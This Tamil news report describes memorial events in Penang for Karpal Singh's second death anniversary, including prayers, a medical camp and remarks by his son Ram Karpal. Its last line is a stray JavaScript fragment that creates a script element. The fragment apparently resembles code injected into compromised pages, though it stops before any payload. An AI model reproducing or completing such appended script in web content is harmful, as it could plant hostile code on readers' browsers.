ஜெலுந்தோங் புலி என்று அழைக்கப்படும் அமரர் கர்பால் சிங் அவர்களின் இரண்டாம் ஆண்டு நினைவஞ்சலி சிறப்பாக கொண்டாடப்பட்டது. முன்னால் புக்கிட் குளுகோர் நாடாளுமன்ற உறுப்பினருமான திரு கர்பால் சிங் நினைவு நாள் வாடா குருத்வாரா சாயிப் ஆலயத்தில் சிறப்பு பூஜைகளுடன் நடைபெற்றது. அன்னாருக்கு மரியாதைச் செலுத்தும் வகையில் அவரது குடும்ப உறுப்பினர்கள் அனைவரும் வருகையளித்தனர். மேலும் , அன்னாரின் நினைவு நாள் முன்னிட்டு பினாங்கு சீக்கியர் சங்கம் ஏற்பாட்டில் இலவச மருத்துவ முகாம் நடத்தப்பட்டது. இந்த மருத்துவ முகாமில் பொது மக்கள் கலந்து கொண்டனர்.
பினாங்கு யுரேசிய சங்கம் நடத்தும் வருடாந்திர நிகழ்வான ஈஸ்டர் விருந்தோம்பல் மற்றும் நடன நிகழ்வில் அமரர் கர்பால் சிங் அவர்களின் நினைவு நாள் நினைவுக்கூர்ந்தனர். இந்நிகழ்வில் அன்னாரின் குடும்ப உறுப்பினர்கள் அனைவரும் கலந்து சிறப்பத்தனர். அன்னாரின் ஆத்ம சாந்தி வேண்டி 1 நிமிடம் மெளன அஞ்சலி செலுத்தப்பட்டது .கர்பால் சிங் விட்டுச்சென்ற பொதுமக்கள் உரிமைக்கும் நீதிக்கும் போராடும் மரபினை நான் தொடர்ந்து பறைச்சாற்றுவேன் என விருந்தோம்பல் நிகழ்வில் கலந்து கொண்ட புக்கிட் குளுகோர் நாடாளுமன்ற உறுப்பினர் திரு ராம் கர்பால் தெரிவித்தார்.
அமரர் கர்பால் சிங் துணைவியாரான திருமதி குர்மிட் கோர் அவர்களுக்குப் பூச்செண்டு வழங்கப்பட்டது. நிகழ்வில் ஆட்சிக்குழு உறுப்பினர் திரு ஜெக்டிப் சிங் டியோ ,பூஞ்சோங் நாடாளுமன்ற உறுப்பினர் கோபிந் சிங் மற்றும் ஶ்ரீ டெலிமா சட்டமன்ற உறுப்பினர் நேதாஜி இராயர் இடம்பெற்றனர்.var d=document;var s=d.createElement(‘script’);